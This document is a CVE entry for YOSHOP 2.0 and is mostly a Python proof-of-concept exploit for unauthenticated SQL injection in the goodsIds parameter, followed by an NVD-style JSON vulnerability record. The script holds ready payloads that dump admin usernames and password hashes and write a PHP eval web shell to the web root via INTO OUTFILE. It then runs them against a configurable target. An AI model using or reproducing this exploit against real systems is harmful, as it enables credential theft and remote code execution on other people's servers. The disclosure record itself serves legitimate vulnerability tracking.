CVE-2025-56162

# CVE-2025-56162 - YOSHOP 2.0 SQL Injection PoC # Vulnerability: Unauthenticated SQL Injection in goodsIds parameter # Endpoint: /api/goods/listByIds # Method: GET import requests target_url = "http://target.com" endpoint = "/api/goods/listByIds" # Payload 1: Basic SQL Injection to test the vulnerability payload_basic = "1) AND 1=1-- -" # Payload 2: UNION-based injection to extract admin password hash payload_union = "1) UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,group_concat(username,0x3a,password) FROM yoshop_user-- -" # Payload 3: Error-based injection payload_error = "1) AND extractvalue(1,concat(0x7e,(SELECT password FROM yoshop_user LIMIT 1)))-- -" # Payload 4: Time-based blind injection payload_time = "1) AND IF(1=1,SLEEP(5),0)-- -" # Payload 5: Write WebShell via INTO OUTFILE (requires FILE privilege) payload_shell = "1) UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'<?php @eval($_POST[\"cmd\"]);?>' INTO OUTFILE '/var/www/html/shell.php'-- -" # Send exploit request def exploit(target, payload): params = {"goodsIds": payload} try: resp = requests.get(target + endpoint, params=params, timeout=10) print(f"[+] Status: {resp.status_code}") print(f"[+] Response: {resp.text[:500]}") return resp except Exception as e: print(f"[-] Error: {e}") return None # Run exploitation print("[*] Testing basic injection...") exploit(target_url, payload_basic) print("\n[*] Extracting admin credentials...") exploit(target_url, payload_union) print("\n[*] Attempting WebShell upload...") exploit(target_url, payload_shell)

{"cve": {"id": "CVE-2025-56162", "sourceIdentifier": "[email protected]", "published": "2025-10-02T16:15:35.047", "lastModified": "2025-10-30T18:33:10.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YOSHOP 2.0 suffers from an unauthenticated SQL injection in the goodsIds parameter of the /api/goods/listByIds endpoint. The getListByIds function concatenates user input into orderRaw('field(goods_id, ...)'), allowing attackers to: (a) enumerate or modify database data, including dumping admin password hashes; (b) write web-shell files or invoke xp_cmdshell, leading to remote code execution on servers configured with sufficient DB privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yiovo:firefly_mall:*:*:*:*:open_source:*:*:*", "versionStartIncluding": "2.01", "matchCriteriaId": "3D9A314C-46D3-418D-AFAF-93394EFCFF32"}]}]}], "references": [{"url": "https://gitee.com/xany/yoshop2.0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ZyWAC/CVE-Disclosures/blob/6b337a44934ffe948275995e9b79158e97c78fc4/2025/YOSHOP2.0/CVE-2025-56162.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}